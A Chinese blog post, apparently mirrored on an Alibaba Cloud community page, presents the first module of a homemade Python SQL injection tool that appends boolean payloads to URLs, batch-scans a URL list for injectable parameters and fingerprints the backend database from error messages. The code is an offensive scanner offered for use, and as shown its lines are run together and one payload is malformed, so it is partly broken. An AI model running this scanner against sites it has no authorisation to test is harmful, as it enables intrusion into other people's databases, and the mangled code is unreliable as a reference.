Python編寫SQL注入工具(1)

來源:互聯網
上載者:User

標籤:

    編寫原由:自學了一點SQL注入和Python的知識.雖然,早就有了非常好的注入工具Sqlmap,但自己想寫一個自動注入的工具玩玩,寫的不好之處,還望不吝指正.

第一部分:注入點測試模組(injectTest.py)

#coding=gb2312import urllibimport osimport stringfrom re import searchclass injectTest():    def __init__(self,url=‘‘):        self.url=url             #待檢測網址,預設為空白        self.a=‘%20and%201=1‘  #檢測語句        self.b=‘%20and%201=2‘        self.urls=[]             #存在注入的urls    #檢測單個網址的函數    def judgeUrl(self):        page=urllib.urlopen(self.url).read()        pagea=urllib.urlopen(self.url+self.a).read()        pageb=urllib.urlopen(self.url+self.b).read()        if page==pagea and page!=pageb:            print ‘網址‘,self.url,‘可能存在注入點!‘            return True        else:            print ‘網址:‘,self.url,‘不存在注入點!‘            return False    #判斷待檢測的網址檔案是否存在    def fileExists(self,name):        path=os.getcwd()        filepath=path+‘\\‘        filepath=filepath+name        return os.path.exists(filepath)    #進行批量檢測    def judgeUrls(self,file):        self.fileExists(file)        #如果不存在預設檢測的網址檔案,則由使用者自行輸入待檢測的檔案        while not self.fileExists(file):            print ‘待檢測網址檔案不存在‘            file=str(raw_input(‘請輸入待檢測的網址檔案:‘))            self.fileExists(file)        urls=open(file,‘r‘)        for url in urls.readlines():            print ‘正在檢測:‘,url            page=urllib.urlopen(url).read()            pagea=urllib.urlopen(url+self.a).read()            pageb=urllib.urlopen(url+self.b).read()            if page==pagea and page!=pageb:                self.urls.append(url)            else:                continue        if len(self.urls):            print ‘以下網址可能存在注入點:‘            for u in self.urls:                print u        else:            print ‘該檔案中不存在有注入的網址!‘    #判斷有注入的網址的資料庫類型    #如果不存在回顯錯誤,則可能不能判斷出資料庫的類型    def whatDatabase(self):        db=‘‘        sql=string.join([‘%20and20%user>0‘],‘‘)        pagex=urllib.urlopen(self.url+sql).read()        if search(‘ODBC Microsoft Access‘,pagex) or search(‘Microsoft JET Database‘,pagex) :            print ‘資料庫:Access‘            db=‘Access‘            return db        elif search(‘SQL Server‘,pagex) or search(‘nvarchar‘,pagex):            print ‘資料庫:MSSQL‘            db=‘MSSQL‘            return  db        elif search(‘You have an error in your SQL syntax‘,pagex) or search(‘Query failed‘,pagex) or search(‘SQL query failed‘,pagex) or search(‘mysql_fetch_‘,pagex) or search(‘mysql_num_rows‘,pagex) or search(‘The used SELECT statements have a different number of columns‘,pagex):            print ‘資料庫:MYSQL‘            db=‘MYSQL‘            return db        else:            print ‘未判斷出資料庫類型!‘            return db

Python編寫SQL注入工具(1)

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.